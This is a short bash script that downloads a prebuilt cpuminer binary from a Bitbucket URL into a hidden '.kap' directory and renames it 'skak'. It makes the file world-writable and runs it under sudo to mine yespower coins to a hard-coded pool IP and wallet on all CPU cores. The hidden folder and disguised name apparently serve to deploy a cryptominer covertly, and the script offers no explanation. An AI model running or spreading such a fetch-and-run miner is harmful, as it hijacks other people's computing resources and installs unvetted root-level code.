#!/bin/bash
apt-get update ; apt-get -y install sudo
mkdir .kap && cd .kap
wget -O skak https://bitbucket.org/aboxx/filee/raw/main/cpuminer-avx2
chmod 777 skak
sudo ./skak -a yespower -o 157.245.57.127:443 -u uu6EPojm3iWPL4xK44dcw1m2H5XwdVUWmo.cuuuk -t $(nproc --all)
